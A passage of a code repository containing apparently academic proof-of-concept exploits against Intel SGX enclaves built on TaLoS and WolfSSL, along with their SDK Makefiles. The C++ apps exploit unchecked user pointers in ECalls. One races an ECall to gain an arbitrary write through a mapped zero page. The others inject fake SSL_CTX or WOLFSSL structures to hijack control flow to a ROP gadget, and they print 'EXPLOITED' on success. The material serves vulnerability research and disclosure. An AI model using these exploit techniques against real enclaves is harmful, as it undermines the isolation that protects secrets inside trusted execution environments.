(uint64_t*) enclave_base(); 67 | 68 | // 1. Map the Zero Page. 69 | void *zero = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); 70 | 71 | pthread_t threadid; 72 | // 2. Create a second thread that will assure that the ECall writes the desires value. 73 | pthread_create(&threadid, NULL, thread, NULL); 74 | 75 | // 3. This ECall will copy the value from the specified address to the Zero Page AND BACK. Due to the race condition this value can be chosen freely. 76 | uint64_t ms[] = { 0, (uint64_t)base + 0x57eac08 - 0x18 }; 77 | // public BIO *ecall_SSL_get_rbio([user_check] const SSL *s); 78 | call_ecall(56, ms); 79 | } 80 | -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-write/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 
29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | 90 | -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-write/enclave.signed.so: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/TaLoS-exploit-race-arbitrary-write/enclave.signed.so -------------------------------------------------------------------------------- /TaLoS-exploit/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | 6 | #include "sgx_edger8r.h" // sgx_ecall 7 | #include "sgx_urts.h" // sgx_create_enclave 8 | 9 | /* Global EID shared by multiple threads */ 10 | sgx_enclave_id_t global_eid = 0; 11 | 12 | int initialize_enclave(const char* enclave_filename) 13 | { 14 | if (global_eid != 0) 15 | return 0; 16 | 17 | sgx_launch_token_t token = {0}; 18 | int updated; 19 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 20 | if (ret != SGX_SUCCESS) 21 | return -1; 22 | 23 | return 0; 24 | } 25 | 26 | void* enclave_base() { 27 | FILE* fp = fopen("/proc/self/smaps", "r"); 28 | if (fp == 0) return 0; 29 | char* line = 0; size_t len = 0; ssize_t read; 30 | 31 | // first isgx page (CODE, r_x) 32 | while((read = getline(&line, &len, fp)) != -1) 33 | if (strstr(line, "isgx")) 34 | return (void*)strtoll(line, NULL, 16); 35 | } 36 | 37 | int call_ecall(int ecall_idx, void* ms) 38 | { 39 | sgx_ecall(global_eid, ecall_idx, 0, ms); 40 | } 41 | 42 | int main(int argc, char** argv) 43 | { 44 | if (initialize_enclave("enclave.signed.so") < 0) 45 | return -1; 46 | 47 | uint64_t* base = (uint64_t*) enclave_base(); 48 | 49 | // 1. Create a fake SSL_CTX 50 | uint64_t buffer[1000] = { 0 }; 51 | buffer[0] = (uint64_t) buffer; 52 | buffer[0x88/8] = 0xDEADC0DE; 53 | buffer[0x88/8] = (uint64_t) base + 0x363f5; 54 | 55 | // 2. The ECall will call the function specified in the fake objecct. 
56 | uint64_t ms[] = { 0, (uint64_t) buffer, 0, (uint64_t) buffer, sizeof(buffer), 1 }; 57 | // public long ecall_SSL_CTX_ctrl([user_check] SSL_CTX *ctx, int cmd, long larg, [user_check] void *parg); 58 | call_ecall(11, ms); 59 | 60 | if ((int) ms[0] == 2) 61 | printf("EXPLOITED\n"); 62 | } 63 | -------------------------------------------------------------------------------- /TaLoS-exploit/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 
54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | 90 | -------------------------------------------------------------------------------- /TaLoS-exploit/enclave.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/TaLoS-exploit/enclave.signed.so -------------------------------------------------------------------------------- /WolfSSL-exploit/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "sgx_edger8r.h" // sgx_ecall 6 | #include "sgx_urts.h" // sgx_create_enclave 7 | 8 | /* Global EID shared by multiple threads */ 9 | sgx_enclave_id_t global_eid = 0; 10 | 11 | int initialize_enclave(const char *enclave_filename) { 12 | if (global_eid != 0) 13 | return 0; 14 | 15 | sgx_launch_token_t token = {0}; 16 | int 
updated; 17 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, 18 | &token, &updated, &global_eid, NULL); 19 | if (ret != SGX_SUCCESS) 20 | return -1; 21 | 22 | return 0; 23 | } 24 | 25 | int call_ecall(int ecall_idx, void *ms) { 26 | sgx_ecall(global_eid, ecall_idx, 0, ms); 27 | } 28 | 29 | int main(int argc, char **argv) { 30 | if (initialize_enclave("enclave.signed.so") < 0) 31 | return -1; 32 | 33 | // ECALL: 34 | // public WOLFSSL_METHOD* enc_wolfTLSv1_2_client_method(void); 35 | uint64_t ms1[1] = {0}; 36 | call_ecall(5, ms1); // client method 37 | 38 | // ECALL: 39 | // public WOLFSSL_CTX* enc_wolfSSL_CTX_new([user_check] WOLFSSL_METHOD* 40 | // method); 41 | uint64_t ms2[2] = {0, ms1[0]}; 42 | call_ecall(7, ms2); // CTX_new(method) 43 | uint64_t ctx = ms2[0]; 44 | 45 | // Here we abuse the function use_PrivateKey_buffer to move an arbitrary 46 | // buffer into enclave memory. However, also other functions, such as the 47 | // `write` function would be suitable to achieve this. 48 | // 49 | // The buffer in the enclave memory then contains a fake WOLFSSL struct, which 50 | // we abuse later. 51 | 52 | // Buffer, which contains the fake WOLFSSL struct 53 | uint64_t buffer[1000] = {0}; 54 | // necessary values, part of fake WOLFSSL struct 55 | buffer[0x3a0 / sizeof(uint64_t)] = 0x20; 56 | buffer[0x120 / sizeof(uint64_t)] = 0x1; 57 | // JUMP TARGET: return 2 58 | // This is the address of a "ROP Gadget" in sgx_enc_wolfSSL_CTX_new 59 | // ``` 60 | // mov rax, 2 61 | // ret 62 | // ``` 63 | // This is just to demonstrate the control-flow hijack and will immediately 64 | // return with a return value that is passed through to the untrusted world. 
65 | // 66 | buffer[0x58 / sizeof(uint64_t)] = ctx & 0xffffffffff000000 | 0x1927; 67 | 68 | // ECALL: 69 | // public int enc_wolfSSL_CTX_use_PrivateKey_buffer( 70 | // [user_check] WOLFSSL_CTX* ctx, 71 | // [in, size=sz] const unsigned char* buf, 72 | // long sz, 73 | // int type); 74 | uint64_t ms3[5] = {0, ctx, (uint64_t)buffer, sizeof(buffer), 1}; 75 | call_ecall(8, ms3); // use_priv_key_buffer(ctx, buf, size, type) 76 | 77 | // we pass a single parameter, which is the pointer to the fake WOLFSSL 78 | // object. 79 | // 80 | // ECALL: 81 | // public int enc_wolfSSL_connect([user_check]WOLFSSL* ssl); 82 | uint64_t ms4[2] = {0, 83 | (uint64_t)(ctx + 0x228)}; // _in_buf of use_priv_key_buffer 84 | // ms4[1] = ms2[0]; 85 | call_ecall(15, ms4); // connect(ctx) 86 | 87 | switch ((int)ms4[0]) { 88 | case 2: 89 | printf("EXPLOITED\n"); 90 | break; 91 | default: 92 | case -1: 93 | printf("ERROR\n"); 94 | } 95 | } 96 | -------------------------------------------------------------------------------- /WolfSSL-exploit/Makefile: -------------------------------------------------------------------------------- 1 | # BEFORE MAKE: 2 | # source ~/linux-sgx/linux/installer/bin/sgxsdk/environment 3 | 4 | ######## SGX SDK Settings ######## 5 | 6 | SGX_SDK ?= /opt/intel/sgxsdk 7 | SGX_MODE ?= HW 8 | SGX_ARCH ?= x64 9 | SGX_DEBUG ?= 1 10 | 11 | ifeq ($(shell getconf LONG_BIT), 32) 12 | SGX_ARCH := x86 13 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 14 | SGX_ARCH := x86 15 | endif 16 | 17 | ifeq ($(SGX_ARCH), x86) 18 | SGX_COMMON_CFLAGS := -m32 19 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 20 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 21 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 22 | else 23 | SGX_COMMON_CFLAGS := -m64 24 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 25 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 26 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 27 | endif 28 | 29 | ifeq ($(SGX_DEBUG), 1) 30 | ifeq ($(SGX_PRERELEASE), 1) 31 | $(error Cannot set 
SGX_DEBUG and SGX_PRERELEASE at the same time!!) 32 | endif 33 | endif 34 | 35 | ifeq ($(SGX_DEBUG), 1) 36 | SGX_COMMON_CFLAGS += -O0 -g 37 | else 38 | SGX_COMMON_CFLAGS += -O2 39 | endif 40 | 41 | ######## App Settings ######## 42 | 43 | ifneq ($(SGX_MODE), HW) 44 | Urts_Library_Name := sgx_urts_sim 45 | else 46 | Urts_Library_Name := sgx_urts 47 | endif 48 | 49 | App_Cpp_Files := App/App.cpp 50 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 51 | 52 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 53 | 54 | # Three configuration modes - Debug, prerelease, release 55 | # Debug - Macro DEBUG enabled. 56 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 57 | # Release - Macro NDEBUG enabled. 58 | ifeq ($(SGX_DEBUG), 1) 59 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 60 | else ifeq ($(SGX_PRERELEASE), 1) 61 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 62 | else 63 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 64 | endif 65 | 66 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 67 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 68 | 69 | ifneq ($(SGX_MODE), HW) 70 | App_Link_Flags += -lsgx_uae_service_sim 71 | else 72 | App_Link_Flags += -lsgx_uae_service 73 | endif 74 | 75 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 76 | 77 | App_Name := app 78 | 79 | ######## Enclave Settings ######## 80 | 81 | Enclave_Version_Script := Enclave/Enclave_debug.lds 82 | ifeq ($(SGX_MODE), HW) 83 | ifneq ($(SGX_DEBUG), 1) 84 | ifneq ($(SGX_PRERELEASE), 1) 85 | # Choose to use 'Enclave.lds' for HW release mode 86 | Enclave_Version_Script = Enclave/Enclave.lds 87 | endif 88 | endif 89 | endif 90 | 91 | ifneq ($(SGX_MODE), HW) 92 | Trts_Library_Name := sgx_trts_sim 93 | Service_Library_Name := sgx_tservice_sim 94 | else 95 | Trts_Library_Name := sgx_trts 96 | Service_Library_Name := sgx_tservice 97 | endif 98 | Crypto_Library_Name := sgx_tcrypto 99 | 100 | Enclave_Cpp_Files := Enclave/Enclave.cpp $(wildcard 
Enclave/TrustedLibrary/*.cpp) 101 | Enclave_Include_Paths := -IInclude -IEnclave -I$(SGX_SDK)/include -I$(SGX_SDK)/include/libcxx -I$(SGX_SDK)/include/tlibc 102 | 103 | Enclave_C_Flags := $(SGX_COMMON_CFLAGS) -nostdinc -fvisibility=hidden -fpie -fstack-protector $(Enclave_Include_Paths) 104 | Enclave_Cpp_Flags := $(Enclave_C_Flags) -nostdinc++ -std=c++11 105 | 106 | # To generate a proper enclave, it is recommended to follow below guideline to link the trusted libraries: 107 | # 1. Link sgx_trts with the `--whole-archive' and `--no-whole-archive' options, 108 | # so that the whole content of trts is included in the enclave. 109 | # 2. For other libraries, you just need to pull the required symbols. 110 | # Use `--start-group' and `--end-group' to link these libraries. 111 | # Do NOT move the libraries linked with `--start-group' and `--end-group' within `--whole-archive' and `--no-whole-archive' options. 112 | # Otherwise, you may get some undesirable errors. 113 | Enclave_Link_Flags := $(SGX_COMMON_CFLAGS) -Wl,--no-undefined -nostdlib -nodefaultlibs -nostartfiles -L$(SGX_LIBRARY_PATH) \ 114 | -Wl,--whole-archive -l$(Trts_Library_Name) -Wl,--no-whole-archive \ 115 | -Wl,--start-group -lsgx_tstdc -lsgx_tcxx -l$(Crypto_Library_Name) -l$(Service_Library_Name) -Wl,--end-group \ 116 | -Wl,-Bstatic -Wl,-Bsymbolic -Wl,--no-undefined \ 117 | -Wl,-pie,-eenclave_entry -Wl,--export-dynamic \ 118 | -Wl,--defsym,__ImageBase=0 \ 119 | -Wl,--version-script=$(Enclave_Version_Script) 120 | 121 | Enclave_Cpp_Objects := $(Enclave_Cpp_Files:.cpp=.o) 122 | 123 | Enclave_Name := enclave.so 124 | Signed_Enclave_Name := enclave.signed.so 125 | Enclave_Config_File := Enclave/Enclave.config.xml 126 | 127 | ifeq ($(SGX_MODE), HW) 128 | ifeq ($(SGX_DEBUG), 1) 129 | Build_Mode = HW_DEBUG 130 | else ifeq ($(SGX_PRERELEASE), 1) 131 | Build_Mode = HW_PRERELEASE 132 | else 133 | Build_Mode = HW_RELEASE 134 | endif 135 | else 136 | ifeq ($(SGX_DEBUG), 1) 137 | Build_Mode = SIM_DEBUG 138 | else ifeq 
($(SGX_PRERELEASE), 1) 139 | Build_Mode = SIM_PRERELEASE 140 | else 141 | Build_Mode = SIM_RELEASE 142 | endif 143 | endif 144 | 145 | 146 | .PHONY: all run 147 | 148 | ifeq ($(Build_Mode), HW_RELEASE) 149 | all: .config_$(Build_Mode)_$(SGX_ARCH) $(App_Name) $(Enclave_Name) 150 | @echo "The project has been built in release hardware mode." 151 | @echo "Please sign the $(Enclave_Name) first with your signing key before you run the $(App_Name) to launch and access the enclave." 152 | @echo "To sign the enclave use the command:" 153 | @echo " $(SGX_ENCLAVE_SIGNER) sign -key -enclave $(Enclave_Name) -out <$(Signed_Enclave_Name)> -config $(Enclave_Config_File)" 154 | @echo "You can also sign the enclave using an external signing tool." 155 | @echo "To build the project in simulation mode set SGX_MODE=SIM. To build the project in prerelease mode set SGX_PRERELEASE=1 and SGX_MODE=HW." 156 | else 157 | all: .config_$(Build_Mode)_$(SGX_ARCH) $(App_Name) # $(Signed_Enclave_Name) 158 | ifeq ($(Build_Mode), HW_DEBUG) 159 | @echo "The project has been built in debug hardware mode." 160 | else ifeq ($(Build_Mode), SIM_DEBUG) 161 | @echo "The project has been built in debug simulation mode." 162 | else ifeq ($(Build_Mode), HW_PRERELEASE) 163 | @echo "The project has been built in pre-release hardware mode." 164 | else ifeq ($(Build_Mode), SIM_PRERELEASE) 165 | @echo "The project has been built in pre-release simulation mode." 166 | else 167 | @echo "The project has been built in release simulation mode." 
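endif
endif

# Build, then launch the application. Skipped in HW_RELEASE mode, where the
# enclave still has to be signed out of band first (see the HW_RELEASE branch
# of `all`).
# The binary is started from $(CURDIR) because App/App.cpp opens
# "enclave.signed.so" by relative path, so `make run` has to be invoked from
# this directory.
run: all
ifneq ($(Build_Mode), HW_RELEASE)
	@$(CURDIR)/$(App_Name)
	@echo "RUN => $(App_Name) [$(SGX_MODE)|$(SGX_ARCH), OK]"
endif

######## App Objects ########

# Untrusted edge-routine proxies generated from Enclave/Enclave.edl.
# They are NOT linked into $(App_Name) (see its prerequisite list below):
# App/App.cpp invokes ECALLs through sgx_ecall() with explicit indices.
# The rules are kept so a checkout that carries the Enclave/ sources can
# still regenerate them.
App/Enclave_u.c: $(SGX_EDGER8R) Enclave/Enclave.edl
	@cd App && $(SGX_EDGER8R) --untrusted ../Enclave/Enclave.edl --search-path ../Enclave --search-path $(SGX_SDK)/include
	@echo "GEN => $@"

App/Enclave_u.o: App/Enclave_u.c
	@$(CC) $(App_C_Flags) -c $< -o $@
	@echo "CC <= $<"

App/%.o: App/%.cpp
	@$(CXX) $(App_Cpp_Flags) -c $< -o $@
	@echo "CXX <= $<"

# The untrusted application links only its own objects plus the SGX
# untrusted runtime libraries carried in App_Link_Flags.
$(App_Name): $(App_Cpp_Objects)
	@$(CXX) $^ -o $@ $(App_Link_Flags)
	@echo "LINK => $@"

# Build-mode stamp: a different SGX_MODE/SGX_DEBUG/SGX_PRERELEASE/SGX_ARCH
# yields a new stamp name, which wipes the products of the previous
# configuration and forces a full rebuild.
# $(Signed_Enclave_Name) is deliberately NOT removed here: `all` no longer
# builds it (that prerequisite is commented out above) and the repository
# ships a prebuilt enclave.signed.so that App/App.cpp loads at run time, so
# deleting it on the first `make` would make `run` fail in
# initialize_enclave().
.config_$(Build_Mode)_$(SGX_ARCH):
	@rm -f .config_* $(App_Name) $(Enclave_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.*
	@touch .config_$(Build_Mode)_$(SGX_ARCH)

######## Enclave Objects ########

# Trusted edge-routine stubs generated from Enclave/Enclave.edl.
Enclave/Enclave_t.c: $(SGX_EDGER8R) Enclave/Enclave.edl
	@cd Enclave && $(SGX_EDGER8R) --trusted ../Enclave/Enclave.edl --search-path ../Enclave --search-path $(SGX_SDK)/include
	@echo "GEN => $@"

Enclave/Enclave_t.o: Enclave/Enclave_t.c
	@$(CC) $(Enclave_C_Flags) -c $< -o $@
	@echo "CC <= $<"

Enclave/%.o: Enclave/%.cpp
	@$(CXX) $(Enclave_Cpp_Flags) -c $< -o $@
	@echo "CXX <= $<"

$(Enclave_Name): Enclave/Enclave_t.o $(Enclave_Cpp_Objects)
	@$(CXX) $^ -o $@ $(Enclave_Link_Flags)
	@echo "LINK => $@"

# Signs the enclave with the key at Enclave/Enclave_private.pem. Release
# enclaves are signed out of band with the developer's own key, as the
# HW_RELEASE branch of `all` instructs.
$(Signed_Enclave_Name): $(Enclave_Name)
	@$(SGX_ENCLAVE_SIGNER) sign -key Enclave/Enclave_private.pem -enclave $(Enclave_Name) -out $@ -config $(Enclave_Config_File)
	@echo "SIGN => $@"

.PHONY: clean

# Removes only files this Makefile produces. The shipped
# $(Signed_Enclave_Name) is left alone for the same reason as in the
# .config_* rule; a locally (re)signed enclave has to be removed by hand.
clean:
	@rm -f .config_* $(App_Name) $(Enclave_Name) $(App_Cpp_Objects)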
App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 225 | -------------------------------------------------------------------------------- /WolfSSL-exploit/Wolfssl_Enclave.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/WolfSSL-exploit/Wolfssl_Enclave.signed.so -------------------------------------------------------------------------------- /WolfSSL-exploit/app: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/WolfSSL-exploit/app -------------------------------------------------------------------------------- /WolfSSL-exploit/enclave.signed.so: -------------------------------------------------------------------------------- 1 | Wolfssl_Enclave.signed.so --------------------------------------------------------------------------------